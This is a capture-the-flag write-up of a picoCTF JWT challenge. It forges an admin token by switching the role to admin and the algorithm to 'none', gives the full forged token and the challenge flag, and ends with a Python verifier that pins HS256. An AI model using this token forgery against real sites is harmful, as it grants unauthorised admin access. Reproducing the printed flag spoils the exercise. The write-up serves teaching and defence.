Write-up author: vreshco
Most web application developers use third-party components without testing their security. Some of the companies affected in the past are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonseca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running here. Can you become an admin? You can log in as test with the password Test123! to get started.
- Use the web browser tools to check out the JWT cookie.
- The JWT should always have two (2) . separators.
- First open the link given.
RESULT
- Since there's no register button, we can use the creds given in the description.
RESULT
- Clearly there's nothing to see here, so let's get the token.
RESULT
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2NzU4NTU4MzN9.hmtzP0PqB8HlJ4NbO6uffs3dc7TE2m64Bbsu8Df6T9o
- Decode that using this online tool.
- Let's try the simple approach first: change the role value to "admin", copy the re-encoded JWT, and paste it into the webapp as our token.
RESULT
- Hmm.. another approach is to remove the algorithm used, i.e. change the alg to none. But since jwt.io can't set the alg to none (it's not in its database), we can use this JWT debugger instead.
CHANGE IT TO NONE
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjc1ODU1ODMzfQ
- Now log in again as test, then paste the token. Remember, a JWT always has two dots (.), while ours has only one, so add another dot at the end.
FINAL TOKEN
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc1ODU1ODMyNjczLCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwOS4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjc1ODU1ODMzfQ.
RESULT
- Got the flag!
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}
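The reason the two-dot trick works is that a verifier which lets the token's own header choose the algorithm treats "none" as "nothing to check", so an empty third segment passes. As an added example (not part of this write-up or the challenge's code; the key is a constructed placeholder), here is a stdlib-only HS256 verifier that pins the algorithm server-side and rejects that unsigned token:

```python
import base64
import hashlib
import hmac
import json

# Constructed key for the demonstration; the challenge's real signing key is not on the page.
EXAMPLE_KEY = b"constructed-demo-key"

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64url padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def build_token(header: dict, payload: dict, key: bytes = b"") -> str:
    # Builds tokens for the checks below: HS256-signed when a key is given, otherwise
    # the unsigned shape from the write-up (two dots, empty third segment).
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{head}.{body}"
    if not key:
        return signing_input + "."
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"

def verify_hs256(token: str, key: bytes) -> dict:
    """Return the payload only for a well-formed HS256 token whose MAC checks out.
    The algorithm is pinned by the server, not read from the header: "none" (or
    anything but HS256) is rejected before any signature logic runs."""
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        raise ValueError("token must have exactly three non-empty segments")
    head, body, sig = parts
    header = json.loads(b64url_decode(head))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):  # constant-time compare
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(body))

def is_accepted(token: str, key: bytes) -> bool:
    # Decoding, JSON and signature failures all derive from ValueError.
    try:
        verify_hs256(token, key)
        return True
    except ValueError:
        return False
```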